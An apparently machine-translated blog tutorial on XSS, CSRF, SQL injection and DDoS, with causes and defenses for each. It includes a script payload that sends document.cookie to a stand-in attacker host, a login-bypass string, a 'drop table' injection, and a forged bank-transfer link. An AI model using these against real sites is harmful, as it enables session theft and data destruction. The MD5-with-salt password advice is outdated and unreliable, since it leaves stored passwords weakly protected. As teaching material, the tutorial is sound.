Summarize several common web attack means and its defense way

This paper briefly introduces several common attack methods and their defensive methods.

• XSS (cross-site scripting attacks)
• CSRF (cross-site request forgery)
• SQL injection
• Ddos

Web Security Series Catalog

• Summarize several common web attack means to defend the way extremely
• Summary of several common security algorithms

XSS Concepts

• The full name is a cross-site scripting Attack (Scripting), which is an attacker embedding a malicious script in a Web page.

Case List

• For example, I wrote a blog site, and then the attacker posted an article, the content is this <script>window.open(“www.gongji.com?param=”+document.cookie)</script> , if I did not deal with his content, directly stored in the database, the next time when other users access to his article, the server read from the database and then respond to the client, The browser executes the script and then sends the user's cookie to the attacker's server.

The reason for being attacked

• The data entered by the user becomes the code, such as the <script> one above, but the string has the function of the code.

Prevention

• Escapes input data, such as < escape &lt;

SQL Injection Concepts

• The SQL command is disguised as a normal HTTP request parameter, passed to the server side, the server executes the SQL command to cause the database to attack

Case

• ‘ or ‘1‘= ‘1。 This is the most common SQL injection attack, when we lose the user name Jiajun, and then the password to lose, when ‘or ‘1‘= ‘1 we query the user name and password is correct, the original is to execute, after the select * from user where username=‘‘ and password=‘‘ parameter stitching, will execute the SQL statement select * from user where username=‘jaijun‘ and password=‘ ‘ or ‘ 1‘=‘1 ‘ , this time 1=1 is set up, It's natural to skip validation.
• But if a bit more serious, the password is lost ‘;drop table user;-- , then the SQL command for select * from user where username=‘jiajun‘ and password=‘‘;drop table user;--‘ this time we will directly delete the table

The reason for being attacked

• The SQL statement forges the parameters and then forms a destructive SQL statement after stitching the parameters, resulting in the database being attacked

Prevention

• In Java, we can use precompiled statements (PreparedStatement), so that even if we use SQL statements to forge parameters, to the service side, the parameters of this forged SQL statement are simply characters, and do not play a role in the attack.
• Many ORM frameworks have been able to escape parameters
• Prepare for the worst, even if it is ' towed ' (' pants off, database leaks '). The password in the database should not be stored in clear text, you can encrypt the password using MD5, in order to increase the cost of cracking, so you can use salt (Database storage user name, salt (random character), MD5 after the ciphertext) way.

CSRF concept

• The full name is cross site request forgery (forgery), which refers to access by masquerading as a trusted user, in layman's words, I visited the a site, then a cookie existed in the browser, and then I visited a rogue website, Accidentally dot Rogue website a link (send a request to a), this time the rogue website took advantage of my identity to a access.

Case List

• This example may not exist in reality, but the attack is the same way. For example, I signed in to a bank website, and then I visited a roommate to a rogue website, and then click on a link inside, then it www.A.com/transfer?account=666&money=10000 is likely that I have to account for 666 of the person turned 1w soft sister currency
• Note that this attack is not necessarily the way I ordered this link, or it can be the site some resource requests point to this transfer link, such as a

The reason for being attacked

• Users store cookies locally, the attacker uses the user's cookie to authenticate, and then forge the user to make the request

Prevention

• The attack was because the attacker exploited the cookie stored in the browser for user authentication, so if we don't use cookies to verify it, we can prevent it. So we can use token (not stored in the browser) authentication.
• Through referer recognition, HTTP Referer is part of the header, when the browser sends a request to the Web server, usually take referer, tell the server I was from which page link, server base this can get some information for processing. In that case, we must log on to bank A to make the transfer.

DDoS Concepts

• Distributed denial of service attacks (distributed denial of service), simply to send a large number of requests is to disable the server. DDoS attacks are based on Dos attacks, can be popular understanding, DOS is singled out, and DDoS is OU, because of the development of modern technology, the destruction of Dos attacks, so there is a DDoS, attackers with public network, the large number of computer equipment to unite, to one or more targets to attack.

Case

• SYN Flood, briefly talking about the TCP three handshake, the client first makes a request, requests a connection, and then the server returns a message indicating that the request is accepted, and then the client returns a message and finally establishes the connection. So if there is a situation where an attacker forges an IP address, sends a message to the server to request a connection, this time the server accepts, according to the TCP three handshake rules, the server will also respond to a message, but this IP is forged, the message to whom the response, the second handshake error, The third time will not go smoothly, this time the server received the third handshake when the client sent the message, and then repeat the second handshake operation. If an attacker forges a large number of IP addresses and makes a request, this time the server will maintain a very large half-connection waiting list, consuming a large amount of resources, and finally the server is paralyzed.
• CC attack, which initiates an attack on the application-layer HTTP protocol and simulates a normal user sending a large number of requests until the site rejects the service.

The reason for being attacked

• Insufficient server bandwidth to block attackers ' attack traffic

Prevention

• The most straightforward way to increase bandwidth. But attackers use local computers to attack, his bandwidth does not cost a lot of money, but for the server, the bandwidth is very expensive.
• Cloud service providers have their own set of complete DDoS solutions and can provide rich bandwidth resources

Summarize

• The above mentioned 4 attack methods, respectively, is the XSS attack (the key is the script, the use of malicious script to attack), CSRF attack (the key is to authenticate with local cookies, forged sending requests), SQL injection (the key is to use SQL statements to forge parameters to attack), DDoS attacks (the key is to make a large number of requests through means and finally crash the server)
• The reason why an attacker can successfully attack, the user operation is a reason, the server is not a good defense is a problem, because there is no control of the user's operation, so we need to develop a server-side defense.
• Not feel absolutely safe, as long as more secure.

Transferred from: http://www.cnblogs.com/-new/p/7135814.html

Summarize several common web attack means and its defense way